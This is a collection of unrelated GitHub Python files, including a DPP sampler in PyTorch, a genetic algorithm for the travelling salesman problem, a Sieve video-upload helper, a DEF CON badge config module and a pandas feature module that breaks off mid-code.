+{"seq_id":"11017483078","text":"\n#Packages\n# Standard library imports\nfrom datetime import date\nimport csv \nimport os\nimport numpy as np\nimport pandas as pd\n\n# Local library imports\nimport Juego, logger\n\n\n\n\nclass score(object):\n \"\"\"Esta clase gestiona la escritura y lectura de los resultados\"\"\"\n def __init__(self):\n self.file_name = \"./scores/partidas.csv\"\n self.columnas = ['fecha', 'nombre_P1', 'nombre_P2', 'ganador', 'jugada_P1', 'jugada_P2']\n self.df = None\n \n\n\n def _write_row(self, msg) -> None:\n \"\"\"Writes a message to the fle_name for a specifc Logger instance\"\"\"\n with open(self.file_name, mode ='a',newline ='\\n') as csvfile:\n csvwriter = csv.writer(csvfile) \n csvwriter.writerow(msg)\n return None\n\n \n # lee resultados, escribe\n # fecha nombre jugador1 nombre jugadore2 ganador jugador1 jugador 2\n\n def escribir_resultados(self,nombre_jugador_1,nombre_jugador_2,ganador,eleccion_jugador1,eleccion_jugador2)-> None:\n \"\"\"Escribe el resutlado de una partida en el csv scores\"\"\"\n #nombre_jugador_1 ='adry'\n #nombre_jugador_2 ='NPC'\n #ganador = 1\n #eleccion_jugador1 = 'Piedra'\n #eleccion_jugador2 = 'Tijera'\n \n today = date.today()\n hoy = today.strftime(\"%Y-%m-%d\")\n row = [hoy,nombre_jugador_1,nombre_jugador_2,ganador,eleccion_jugador1,eleccion_jugador2 ]\n self._write_row(row)\n\n return None \n \n def leer(self)-> None:\n\n \"\"\"Lee valores de resultados pasados y los escribe como un dataframe llamado results\"\"\"\n results = pd.DataFrame(columns = self.get_columns())\n columnas = self.get_columns()\n with open(self.file_name, mode ='r',newline ='\\n') as csvfile:\n spamreader = csv.reader(csvfile, delimiter=',')\n \n for row in spamreader:\n aux = np.array(row).reshape(1,len(columnas))\n df_aux = pd.DataFrame(aux, columns=columnas)\n results = pd.concat([results,df_aux])\n self.set_df(results)\n return None \n\n\n def Tops(self)-> pd.DataFrame:\n \"\"\"calculo de tops: pctge de victorias , numero victorias, numero de partidas \"\"\"\n df = self.get_df().copy()\n\n #procesamiento de datos\n dfa = pd.concat([df['nombre_P1'].value_counts().rename('Partidas'),df.groupby('nombre_P1')['ganador'].sum().rename('Victorias')], axis=1)\n\n dfa['pctge_Victorias'] = dfa['Victorias']/dfa['Partidas']\n dfa.sort_values(by=['pctge_Victorias'], ascending=False,inplace =True)\n dfa = dfa[['pctge_Victorias','Victorias','Partidas']]\n return dfa\n\n def get_columns(self)-> list:\n return self.columnas\n\n def get_df(self)-> pd.DataFrame:\n aux = self.df\n aux['ganador'] = aux['ganador'].astype('int64')\n return aux\n \n def set_df(self,df)-> None:\n self.df = df\n return None\n\nif __name__ == '__main__':\n print(\"Hellowis\")","repo_name":"adryCrespo/JankenPo","sub_path":"bin/Scores.py","file_name":"Scores.py","file_ext":"py","file_size_in_byte":2987,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"743205490","text":"import sys\r\ngroups = {}\r\noperations = {\"difference\", \"union\", \"intersection\"}\r\ndef operation(op, a, b, stack):\r\n if op == \"difference\":\r\n ans = a.difference(b)\r\n stack.append(ans)\r\n elif op == \"union\":\r\n ans = a.union(b)\r\n stack.append(ans)\r\n else:\r\n ans = a.intersection(b)\r\n stack.append(ans)\r\nfor i in sys.stdin.readlines():\r\n stack = []\r\n line = i.strip().split()\r\n if line[0] == 'group':\r\n groups[line[1]] = set(line[3:])\r\n else:\r\n line.reverse()\r\n for val in line:\r\n if val not in operations:\r\n stack.append(groups[val])\r\n else:\r\n a = stack.pop()\r\n b = stack.pop()\r\n operation(val,a,b,stack)\r\n ret = []\r\n for item in stack:\r\n for k in item:\r\n ret.append(k)\r\n print(\" \".join(sorted(ret)))\r\n","repo_name":"DragonOfTheEast/kattisProblems","sub_path":"selectgroup.py","file_name":"selectgroup.py","file_ext":"py","file_size_in_byte":888,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33208328660","text":"import torch\nimport torch.nn as nn\nfrom torch.autograd import Function\nfrom torch.autograd import StochasticFunction\nfrom torch.autograd import Variable\n\nimport dpp_nets.dpp as dpp\nfrom dpp_nets.my_torch.utilities import omit_slice\nfrom dpp_nets.my_torch.utilities import orthogonalize\n\nclass DPP_Numpy(Function):\n \"\"\"\n Uses Numpy Functions to sample from the DPP implicitly \n defined through embd, returns score as a gradient in the\n backward computation (needs to be complemented by hooks\n for REINFORCE or control variate training)\n\n Arguments:\n Depending on whether you're training Double or Float, provide\n dtype = torch.FloatTensor\n dtype = torch.DoubleTensor\n \"\"\"\n def __init__(self, dtype):\n self.dtype = dtype\n\n def forward(self, embd):\n\n \t# Perform SVD to get eigenvalue decomposition of L\n u1, s, u2 = torch.svd(embd)\n e = torch.pow(s,2).numpy()\n v = u1.numpy()\n\n # Sample subset from the DPP\n subset = torch.from_numpy(dpp.sample_dpp(e, v, one_hot=True))\n subset = subset.type(self.dtype)\n\n # Save tensors for backward (gradient computation)\n self.save_for_backward(embd, subset)\n\n return subset\n \n def backward(self, grad_output):\n embd, subset = self.saved_tensors\n embd, subset = embd.numpy(), subset.numpy()\n\n score = torch.from_numpy(dpp.score_dpp(embd, subset))\n score = score.type(self.dtype)\n\n return score\n\nclass DPPLayer_Numpy(nn.Module):\n \"\"\"\n Uses Numpy Functions to sample from the DPP implicitly \n defined through embd, returns score as a gradient in the\n backward computation (needs to be complemented by hooks\n for REINFORCE or control variate training)\n\n Arguments:\n Depending on whether you're training Double or Float, provide\n dtype = torch.FloatTensor\n dtype = torch.DoubleTensor\n \"\"\"\n def __init__(self, dtype):\n super(DPPLayer_Numpy, self).__init__()\n self.dtype = dtype\n\n def forward(self, embd):\n return DPP_Numpy(self.dtype)(embd)\n\n\nclass DPP(StochasticFunction):\n \n def forward(self, vals, vecs):\n\n # Sometimes orthogonalization fails (i.e. deletes vectors)\n # In that case just retry!\n self.dtype = vals.type()\n\n while True:\n try:\n # Set-up\n n = vecs.size(0)\n n_vals = vals.size(0)\n\n # Sample a set size\n index = (vals / (vals + 1)).bernoulli().byte()\n k = torch.sum(index)\n\n # Check for empty set\n if not k:\n subset = vals.new().resize_(n).copy_(torch.zeros(n))\n self.save_for_backward(vals, vecs, subset) \n return subset\n \n # Check for full set\n if k == n:\n subset = vals.new().resize_(n).copy_(torch.ones(n))\n self.save_for_backward(vals, vecs, subset) \n return subset\n\n # Sample a subset\n V = vecs[index.expand_as(vecs)].view(n, -1)\n subset = vals.new().resize_(n).copy_(torch.zeros(n))\n \n while subset.sum() < k:\n\n # Sample an item\n probs = V.pow(2).sum(1, keepdim=True).t()\n item = probs.multinomial(1)[0,0]\n subset[item] = 1\n \n # CHeck if we got k items now\n if subset.sum() == k:\n break\n\n # Choose eigenvector to eliminate\n j = V[item, ].abs().sign().unsqueeze(1).t().multinomial(1)[0,0]\n Vj = V[:, j]\n \n # Update vector basis\n V = omit_slice(V,1,j)\n V.sub_(Vj.ger(V[item, :] / Vj[item]))\n\n # Orthogonalize vector basis\n V, _ = torch.qr(V)\n \n self.save_for_backward(vals, vecs, subset) \n\n return subset\n except RuntimeError:\n print(\"RuntimeError\")\n continue\n \n break\n \n def backward(self, reward):\n #TODO: Need to check this!\n # Checked it! Looks good.\n\n # Set-up\n if False:\n vals, vecs, subset = self.saved_tensors#\n dtype = self.dtype\n n = vecs.size(0)\n n_vals = vals.size(0)\n subset_sum = subset.long().sum()\n\n # auxillary\n matrix = vecs.mm(vals.diag()).mm(vecs.t())\n P = torch.eye(n).type(dtype).masked_select(subset.expand(n,n).t().byte()).view(subset_sum, -1).type(dtype)\n submatrix = P.mm(matrix).mm(P.t())\n subinv = torch.inverse(submatrix)\n Pvecs = P.mm(vecs)\n \n # gradiens\n grad_vals = 1 / vals\n grad_vals += Pvecs.t().mm(subinv).mm(Pvecs).diag()\n grad_vecs = P.t().mm(subinv).mm(Pvecs).mm(vals.diag())\n\n grad_vals.mul_(reward)\n grad_vecs.mul_(reward)\n\n return grad_vals, grad_vecs\n\n if False:\n vals, vecs, subset = self.saved_tensors#\n dtype = self.dtype\n n = vecs.size(0)\n n_vals = vals.size(0)\n subset_sum = subset.long().sum()\n\n grad_vals = 1 / vals\n grad_vecs = torch.zeros(n, n_vals).type(dtype)\n\n if subset_sum:\n # auxillary\n matrix = vecs.mm(vals.diag()).mm(vecs.t())\n print(matrix) ## remove later\n print('Size of matrix', matrix.size()) ## remove later\n print('Subset Sum', subset_sum) ## remove later\n print('n', n) ## remove later\n print('n_vals', n_vals) ## remove later\n print('dtype', dtype)\n print('1 P', torch.eye(n).type(dtype))\n print('2 P', subset.expand(n,n).t().byte())\n print('3 P', torch.eye(n).type(dtype).masked_select(subset.expand(n,n).t().byte()))\n P = torch.eye(n).type(dtype).masked_select(subset.expand(n,n).t().byte()).view(subset_sum, -1).type(dtype)\n submatrix = P.mm(matrix).mm(P.t())\n subinv = torch.inverse(submatrix)\n Pvecs = P.mm(vecs)\n print('backwarded once.')\n\n grad_vals += Pvecs.t().mm(subinv).mm(Pvecs).diag()\n grad_vecs += P.t().mm(subinv).mm(Pvecs).mm(vals.diag()) \n\n grad_vals.mul_(reward)\n grad_vecs.mul_(reward)\n\n return grad_vals, grad_vecs\n\n vals, vecs, subset = self.saved_tensors\n\n dtype = self.dtype\n n = vecs.size(0)\n n_vals = vals.size(0) # \n subset_sum = subset.long().sum() # How large is the subset?\n\n # grad_vals = 1 / vals\n # grad_vecs = torch.zeros(n, n_vals).type(dtype)\n \n grad_vals = 1 / vals\n grad_vecs = vecs.new().resize_(n, n_vals).copy_(torch.zeros(n, n_vals))\n\n try:\n if subset_sum:\n running_ix = subset.new().resize_(n).copy_(torch.arange(0,n))\n ix = (subset * running_ix).nonzero().squeeze()\n Pvecs = vecs[ix,:].squeeze(1)\n\n submatrix = Pvecs.mm(vals.diag()).mm(Pvecs.t())\n subinv = torch.inverse(submatrix)\n\n grad_vals += Pvecs.t().mm(subinv).mm(Pvecs).diag()\n grad_vecs[ix,:] += subinv.mm(Pvecs).mm(vals.diag()) \n\n grad_vals.mul_(reward)\n grad_vecs.mul_(reward)\n \n except RuntimeError:\n grad_vals.copy_(torch.zeros(n_vals))\n grad_vecs.copy_(torch.zeros(n, n_vals))\n print('An Error occured. Sub-Routine.')\n \n finally:\n return grad_vals, grad_vecs\n\nclass AllInOne(StochasticFunction):\n \n def forward(self, kernel):\n self.dtype = kernel.type()\n\n vecs, vals, _ = torch.svd(kernel)\n vals.pow_(2)\n\n # Sometimes orthogonalization fails (i.e. deletes vectors)\n # In that case just retry!\n while True:\n try:\n # Set-up\n n = vecs.size(0)\n n_vals = vals.size(0)\n\n # Sample a set size\n index = (vals / (vals + 1)).bernoulli().byte()\n k = torch.sum(index)\n\n # Check for empty set\n if not k:\n subset = vals.new().resize_(n).copy_(torch.zeros(n))\n self.save_for_backward(kernel, subset) \n return subset\n \n # Check for full set\n if k == n:\n subset = vals.new().resize_(n).copy_(torch.ones(n))\n self.save_for_backward(kernel, subset) \n return subset\n\n # Sample a subset\n V = vecs[index.expand_as(vecs)].view(n, -1)\n subset = vals.new().resize_(n).copy_(torch.zeros(n))\n \n while subset.sum() < k:\n\n # Sample an item\n probs = V.pow(2).sum(1, keepdim=True).t()\n item = probs.multinomial(1)[0,0]\n subset[item] = 1\n \n # CHeck if we got k items now\n if subset.sum() == k:\n break\n\n # Choose eigenvector to eliminate\n j = V[item, ].abs().sign().unsqueeze(1).t().multinomial(1)[0,0]\n Vj = V[:, j]\n \n # Update vector basis\n V = omit_slice(V,1,j)\n V.sub_(Vj.ger(V[item, :] / Vj[item]))\n\n # Orthogonalize vector basis\n V, _ = torch.qr(V)\n\n except RuntimeError:\n print(\"RuntimeError, Orthogonalization failed presumably.\")\n continue\n break\n \n self.save_for_backward(kernel, subset) \n \n return subset\n \n def backward(self, reward):\n #TODO: Need to check this!\n # Checked it! Looks good.\n\n # Set-up\n kernel, subset = self.saved_tensors\n dtype = self.dtype\n\n n, kernel_dim = kernel.size()\n subset_sum = subset.long().sum() \n grad_kernel = torch.zeros(kernel.size()).type(dtype)\n\n if subset_sum:\n # auxillary\n P = torch.eye(n).type(dtype).masked_select(subset.expand(n,n).t().byte()).view(subset_sum, -1).type(dtype)\n subembd = P.mm(kernel)\n submatrix = subembd.mm(subembd.t())\n submatinv = torch.inverse(submatrix)\n subgrad = 2 * submatinv.mm(subembd)\n subgrad = P.t().mm(subgrad)\n grad_kernel.add_(subgrad)\n \n # Gradient from whole L matrix\n K = kernel.t().mm(kernel) # not L!\n I_k = torch.eye(kernel_dim).type(dtype)\n I = torch.eye(n).type(dtype)\n inv = torch.inverse(I_k + K)\n B = I - kernel.mm(inv).mm(kernel.t())\n grad_from_full = 2 * B.mm(kernel)\n grad_kernel.sub_(grad_from_full)\n\n grad_kernel.mul_(reward)\n\n return grad_kernel\n\n","repo_name":"mbp28/dpp_nets","sub_path":"dpp_nets/my_torch/DPP.py","file_name":"DPP.py","file_ext":"py","file_size_in_byte":11388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10181352940","text":"import random\nimport numpy as np\n\n\nclass AG:\n def __init__(self, npop, ngen, nelite, has_elite, pc, pm, tsp):\n self.npop = npop\n self.ngen = ngen\n self.nelite = nelite\n self.pc = pc\n self.pm = pm\n self.tsp = tsp\n self.stagnation = 0\n self.high_mutation_interation = 0\n\n self.pop = list()\n self.inter_pop = list()\n self.elite = list()\n self.has_elite = has_elite\n self.fit_elite = 0\n print('aqui')\n for i in range(npop):\n genes = list()\n for i in range(self.tsp.n):\n genes.append(0)\n self.pop.append(genes)\n self.inter_pop.append(genes)\n\n def create_initial_pop(self):\n for i in range(self.npop):\n\n in_path = list()\n for k in range(self.tsp.n):\n in_path.append(False)\n\n j = 0\n while j < self.tsp.n:\n node = random.randint(0, self.tsp.n-1)\n if in_path[node] == True:\n continue\n self.pop[i][j] = node\n in_path[node] = True\n j += 1\n\n def get_fo(self, path):\n total = 0\n for p in range(len(path)):\n if p != (len(path)-1):\n total += self.tsp.get_distance(path[p], path[p+1])\n try:\n total += self.tsp.get_distance(path[len(path)-1], path[0])\n except:\n return 0\n\n return total\n\n def evaluate_pop(self, pop):\n fit = list()\n for i in range(self.npop):\n fit.append(self.get_fo(pop[i]))\n\n return fit\n\n def roullet(self, fit):\n total = 0\n for f in fit:\n total += 1/f\n\n rou = list()\n for f in fit:\n rou.append((1/f)/total)\n\n first_parent = 0\n second_parent = 0\n\n for i in range(2):\n value = random.uniform(0, 1)\n rou_sum = 0\n nparent = 0\n for j in range(self.npop):\n if rou_sum >= value:\n if i == 0:\n first_parent = nparent\n else:\n second_parent = nparent\n if second_parent == first_parent:\n j = 0\n value = random.uniform(0, 1)\n rou_sum = 0\n nparent = 0\n continue\n break\n rou_sum += rou[j]\n nparent += 1\n\n return first_parent, second_parent\n\n def get_parents(self, fit):\n parents = list()\n n_parents = 0\n while n_parents < self.npop:\n first_parent, second_parent = self.roullet(fit)\n parents.append(first_parent)\n parents.append(second_parent)\n n_parents += 2\n\n return parents\n\n def get_wrost_fit(self):\n fit = self.evaluate_pop(self.inter_pop)\n\n max_fit = max(fit)\n p_max = fit.index(max_fit)\n\n return p_max, max_fit\n\n def get_best_fit(self, fit):\n min_fit = min(fit)\n\n return min_fit, fit.index(min_fit)\n\n def cross(self, first_parent, second_parent):\n children = list()\n for i in range(self.tsp.n):\n children.append(-1)\n\n delta = 0\n first_slice = 0\n second_slice = 0\n while delta == 0:\n first_slice = random.randint(0, self.tsp.n-1)\n second_slice = random.randint(first_slice, self.tsp.n-1)\n delta = second_slice - first_slice\n\n children[first_slice:second_slice] = first_parent[first_slice:second_slice]\n order_parent = list()\n for gene in second_parent:\n if (gene in children) == False:\n order_parent.append(gene)\n\n order = 0\n for j in range(second_slice, self.tsp.n):\n children[j] = order_parent[order]\n order += 1\n\n for j in range(0, first_slice):\n children[j] = order_parent[order]\n order += 1\n\n return children\n\n def crossover(self, parents, fit):\n children = 0\n\n for i in range(0, len(parents), 2):\n first_parent = self.pop[parents[i]]\n second_parent = self.pop[parents[i+1]]\n\n first_children = self.cross(first_parent, second_parent)\n second_children = self.cross(second_parent, first_parent)\n\n if random.uniform(0, 1) <= self.pc:\n self.inter_pop[children] = first_children\n self.inter_pop[children+1] = second_children\n else:\n self.inter_pop[children] = first_parent\n self.inter_pop[children+1] = second_parent\n\n children += 2\n\n def mutation(self):\n for individual in self.inter_pop:\n value = random.uniform(0, 1)\n if self.high_mutation_interation == 0:\n if value <= self.pm:\n i = -1\n j = -1\n while i == j:\n i = random.randint(0, len(individual)-1)\n j = random.randint(0, len(individual)-1)\n\n aux = individual[i]\n individual[i] = individual[j]\n individual[j] = aux\n else:\n #print('Alta mutação!!!!!!!!!!!!!!!!!!!!!!!!!!')\n if value <= 0.2:\n i = -1\n j = -1\n while i == j:\n i = random.randint(0, len(individual)-1)\n j = random.randint(0, len(individual)-1)\n\n aux = individual[i]\n individual[i] = individual[j]\n individual[j] = aux\n self.high_mutation_interation += 1\n\n def get_elite(self, g, fit):\n best_fit, p_best = self.get_best_fit(fit)\n\n if g == 0:\n self.elite = self.pop[p_best].copy()\n self.fit_elite = best_fit\n else:\n if best_fit < self.fit_elite:\n self.elite = self.pop[p_best].copy()\n self.fit_elite = best_fit\n else:\n self.stagnation += 1\n if self.stagnation == 500:\n self.stagnation = 0\n self.high_mutation_interation = 1\n\n if self.high_mutation_interation == 4:\n self.high_mutation_interation = 0\n\n pos = random.randint(0, self.npop-1)\n self.pop[pos] = self.elite\n\n def get_parcial_statics(self, statics_dict, gen, fit):\n gen_statics = dict()\n gen_statics[\"Media\"] = np.median(fit)\n gen_statics[\"DSVP\"] = np.std(fit)\n statics_dict[str(gen)] = gen_statics\n\n def init(self):\n self.create_initial_pop()\n history = list()\n statics_dict = dict()\n\n generation = 0\n while generation < self.ngen:\n fit = self.evaluate_pop(self.pop)\n parents = self.get_parents(fit)\n self.crossover(parents=parents, fit=fit)\n self.mutation()\n self.get_parcial_statics(statics_dict, generation, fit)\n self.pop = self.inter_pop\n fit = self.evaluate_pop(self.pop)\n if self.has_elite == 1:\n self.get_elite(generation, fit)\n fit = self.evaluate_pop(self.pop)\n best_fit, _ = self.get_best_fit(fit)\n history.append((best_fit, generation))\n '''\n print('-' * 25)\n print('Geração = ' + str(generation))\n print('Elite = ' + str(self.fit_elite))\n print('Melhor sol da Geração = ' + str(best_fit))\n print('-' * 25)\n # input('OK>')\n '''\n generation += 1\n\n return history, statics_dict\n","repo_name":"LucasVidigal98/Bio-Inspired-Algorithms","sub_path":"TSP/src/AG.py","file_name":"AG.py","file_ext":"py","file_size_in_byte":7880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31768492777","text":"import sys\nimport os\nsys.path.append(\"bin\")\nsys.path.append(\"bin/measure\")\nsys.path.append(\"bin/professor\")\n\nimport toolbar_rc\nfrom PyQt5 import QtCore, QtGui, QtWidgets,uic\nfrom PyQt5.QtGui import QIcon, QPixmap\nfrom menu_functions import mainmenu_funcs\nfrom menu_objects import mainmenu_objects\nfrom log import gui_log,errorlog\nfrom professor import professor\n\nglobal mmf\nmmf = mainmenu_funcs()\nmmo = mainmenu_objects()\ndef version_control():\n app_version = \"0.1\"\n version_info = \"\"\n return app_version, version_info\nclass mainwin(QtWidgets.QMainWindow):\n def __init__(self,):\n super(mainwin, self).__init__()\n uic.loadUi('automotion_gui.ui', self)\n self.clicks()\n\n def clicks(self):\n self.start_stop_btn.clicked.connect(mmf.run)\n self.input_image_btn.clicked.connect(mmf._import_pic)\n self.image_proc_btn.clicked.connect(mmf.import_image_processing)\n self.output_graph_btn.clicked.connect(mmf.show_output)\n self.pushButton.clicked.connect(mmf.segmentation)\n self.pre_pro_output_btn.clicked.connect(lambda : mmf.show_pic(mmf.current_image()))\n self.scratch_detection_btn.clicked.connect(mmf.scratch_detection)\n self.pushButton_2.clicked.connect(lambda : mmf.show_pic(mmf.professor.output_image))\n #self.empty.clicked.connect(mmf.reset_all)\n #self.filter_options.clicked.connect(mmf.delete_filter)\n\nif __name__ == \"__main__\":\n import sys\n app = QtWidgets.QApplication(sys.argv)\n MainWindow = QtWidgets.QMainWindow()\n ui = mainwin()\n log = gui_log(ui)\n app.setStyle(\"fusion\")\n info = \"Hoş Geldiniz ! \\nUygulama Sürümü : \" + version_control()[0] + \"\\n\"\n log(info)\n process = professor.professor()\n mmf.load_gui(gui=ui, app=app, wdg=MainWindow, log=log, proc=process) # load class features to mm func module\n mmo.load_gui(ui) # load class gui to menu objects\n ui.show()\n sys.exit(app.exec_())\n","repo_name":"QuAS-Robotic/quatomation","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39030413956","text":"#import module/package\r\n#pip install tqdm\r\n\r\n#import the module/package\r\nfrom tqdm import tqdm,trange\r\nimport time\r\n\r\nfor i in tqdm(range(10)):\r\n time.sleep(0.4)\r\n\r\nprint(\"\\n\")\r\nprint (\"Second way to do it\") \r\n\r\nfor i in trange(5):\r\n time.sleep(0.4)","repo_name":"Nishantsingh70/Python_Small_Concept_Questions","sub_path":"ProgressBar.py","file_name":"ProgressBar.py","file_ext":"py","file_size_in_byte":254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18577555917","text":"import os\nimport requests\n\ndef upload_local_video(api_key, video_file_path):\n # ensure video file exists\n if os.path.isfile(video_file_path) is False:\n raise ValueError('Video file not found')\n\n # get a secure URL to upload the video to\n r = requests.get(\n 'https://api.sievedata.com/v1/create_local_upload_url',\n headers={\n 'X-API-Key': api_key\n }\n )\n request_json = r.json()\n\n # ensure API key is valid\n if 'description' in request_json and request_json['description'] == 'Unauthorized':\n raise ValueError('Invalid Sieve API key')\n \n # upload video to secure storage bucket\n put_url = request_json['upload_url']\n download_url = request_json['get_url']\n\n with open(video_file_path, 'rb') as f:\n r = requests.put(\n put_url,\n data=f,\n headers={\n 'content-type': 'application/octet-stream',\n \"x-goog-content-length-range\": \"0,1000000000\"\n }\n )\n if r.status_code != 200:\n raise ValueError('Failed to upload video to secure storage bucket')\n\n # push video from uploaded URL to Sieve\n r = requests.post(\n \"https://api.sievedata.com/v1/push_video\",\n json={\n \"video_url\": download_url,\n \"project_name\": 'demo_project'\n },\n headers={\n \"X-API-Key\": api_key,\n \"Content-Type\": \"application/json\"\n }\n )\n\n if r.status_code != 200:\n raise ValueError(r.json()['description'])\n","repo_name":"bigdatasciencegroup/automatic-video-processing","sub_path":"sieve_helpers.py","file_name":"sieve_helpers.py","file_ext":"py","file_size_in_byte":1550,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"6861594345","text":"import setuptools\n\nwith open(\"../README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"pyspark_cicd\", \n version=\"1.1.0\",\n author=\"Sankar Mukherjee\",\n author_email=\"sanmuk21@gmail.com\",\n description=\"PySpark CICD Project\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/sankamuk/pyspark_cicd\",\n packages=setuptools.find_packages(),\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n python_requires='>=3.6',\n)\n","repo_name":"sankamuk/pyspark_cicd","sub_path":"src/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"73094106434","text":"import json\n\n\ndef parse():\n \"\"\"parse the json.\n\n 1) convert `map` to `list`.\n 2) fix url error.\n \"\"\"\n with open('data.json', 'r') as f:\n companies = json.loads(f.read())['companies']\n for com in companies:\n com['job_types'] = [k for (k, v) in com['job_types'].items() if v]\n com['degrees'] = [k for (k, v) in com['degrees'].items() if v]\n com['authorizations'] = [k for (k, v) in com['authorizations'].items() if v]\n if com['website'].startswith(\"http://http://\")\\\n or com['website'].startswith(\"http://https://\"):\n com['website'] = com['website'][7:]\n\n with open('another.json', 'w') as f:\n f.write(json.dumps(companies))\n\n\nif __name__ == '__main__':\n parse()\n","repo_name":"yhfyhf/Rock-the-Cornell-Career-Fair","sub_path":"parse.py","file_name":"parse.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3175982373","text":"from setuptools import find_packages, setup\n\npackage_name = 'robot_controller'\n\nsetup(\n name=package_name,\n version='0.0.0',\n packages=find_packages(exclude=['test']),\n data_files=[\n ('share/ament_index/resource_index/packages',\n ['resource/' + package_name]),\n ('share/' + package_name, ['package.xml']),\n ],\n install_requires=['setuptools'],\n zip_safe=True,\n maintainer='hubot',\n maintainer_email='chen.hub@northeastern.edu',\n description='TODO: Package description',\n license='TODO: License declaration',\n tests_require=['pytest'],\n entry_points={\n 'console_scripts': [\n \"test_node = robot_controller.test_node:main\",\n \"test_subscriber = robot_controller.test_subscriber:main\",\n \"trajectory_planner = robot_controller.trajectory_planner:main\",\n \"user_interface = robot_controller.user_interface:main\",\n \"plan_executor = robot_controller.plan_executor:main\"\n ],\n },\n)\n","repo_name":"HubotChen/RobotArmV1","sub_path":"src/robot_controller/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16340376999","text":"import ujson as json\n\nCONFIG_FILE = \"/config.json\"\n\nKEY_NAME = 'name'\nKEY_OFFSET = 'offset'\nKEY_WIFI_SSID = 'wifi_ssid'\nKEY_WIFI_PWD = 'wifi_pwd'\nKEY_INVERTED = 'inverted'\nKEY_CURRENT = 'current'\n\nDEFAULT_NAME = 'Ma77D@m0n'\n# Vegas is PST, DEFCON is during daylight savings\nDEFAULT_OFFSET = -7 \n\nDEFAULT_INVERTED = False\n\nDEFAULT_WIFI_SSID = 'Matt Damon'\nDEFAULT_WIFI_PWD = 'WEmustSAVEhim'\n\nDEFAULT_CURRENT = False\n\nconfig = {}\n\ndef load(): \n global config\n try:\n with open(CONFIG_FILE) as cfg_file:\n config = json.load(cfg_file)\n\n # Make sure this value is in config, it's special since it was added late\n # during development and some prototypes won't have it\n if not KEY_CURRENT in config:\n config[KEY_CURRENT] = DEFAULT_CURRENT\n except:\n print(\"CONFIG: Unable to open config file, going with defaults, this is okay! See rtfm.md.\")\n save()\n\ndef reset():\n config[KEY_NAME] = DEFAULT_NAME\n config[KEY_OFFSET] = DEFAULT_OFFSET\n config[KEY_WIFI_SSID] = DEFAULT_WIFI_SSID\n config[KEY_WIFI_PWD] = DEFAULT_WIFI_PWD\n config[KEY_INVERTED] = DEFAULT_INVERTED\n config[KEY_CURRENT] = DEFAULT_CURRENT\n\ndef save():\n with open(CONFIG_FILE, 'w') as cfg_file:\n json.dump(config, cfg_file)\n\n# ensure factory defaults on load\nreset()","repo_name":"ANDnXOR/ANDnXOR_DC30_Badge","sub_path":"src/chomper_config.py","file_name":"chomper_config.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"61"} +{"seq_id":"6737972833","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ----------------------------------\n# File : cat1_common_derived_features.py\n# Author: liushichang\n# Date : 2021/3/23\n# Desc : 衍生特征\n# Contact : liushichang@meituan.com\n# ----------------------------------\nimport itertools\n\nimport numpy as np\nimport pandas as pd\n\n\nclass DerivedFeature(object):\n def __init__(self, cat1_id, dt_field='dt'):\n self.cat1_id = cat1_id\n self.dt_field = dt_field\n\n @staticmethod\n def get_day_possion_pred(total_data, total_train_data, longtail_data):\n \"\"\"\n 获取泊松分布预测值\n :param total_data: 原始数据\n :param total_train_data: 训练数据\n :param longtail_data: 长尾数据\n :return: 泊松分布结果\n \"\"\"\n\n results = []\n longtail_results = []\n\n for wh_id, df_total_raw in total_data.groupby('wh_id'):\n\n # step1: 非长尾数据处理\n train_data = df_total_raw[df_total_raw.is_train == 1]\n\n # 基准数据\n day_base = pd.DataFrame({'day_abbr': total_train_data['day_abbr'].unique()})\n cat2_base = pd.DataFrame({'cat2_name': total_train_data['cat2_name'].unique()})\n list_base = list(itertools.product(day_base.values.tolist(), cat2_base.values.tolist()))\n df_base = pd.DataFrame(list(map(lambda x: sum(x, []), list_base)), columns=['day_abbr', 'cat2_name'])\n\n # 各品类统计值\n dt_range = train_data.sort_values('dt').dt.unique()[-45:]\n part_train = train_data[train_data.dt.isin(dt_range)]\n count_data = part_train.groupby(['cat2_name', 'day_abbr'], as_index=False)['arranged_cnt'] \\\n .agg({'day_avg': np.mean})\n count_data['day_avg'] += 0.01\n count_data['week_sum'] = count_data.groupby(['cat2_name']).transform(np.sum).iloc[:, -1]\n count_data['sale_ratio'] = count_data['day_avg'] / count_data['week_sum']\n\n # 与基准数据合并,填补空值\n count_data = df_base.merge(count_data, how='left', on=['cat2_name', 'day_abbr'])\n count_data.loc[count_data['day_avg'].isnull() == True, ['day_avg', 'week_sum', 'sale_ratio']] \\\n = [1, 7, 1 / 7]\n\n # 品类销量占比特征\n col = ['cat2_name', 'day_abbr', 'sale_ratio']\n df_total_raw = df_total_raw.merge(count_data[col], how='left', on=['cat2_name', 'day_abbr'])\n\n # 汇总非长尾数据\n results.append(df_total_raw)\n\n # step2: 泊松分布处理\n possion_data = 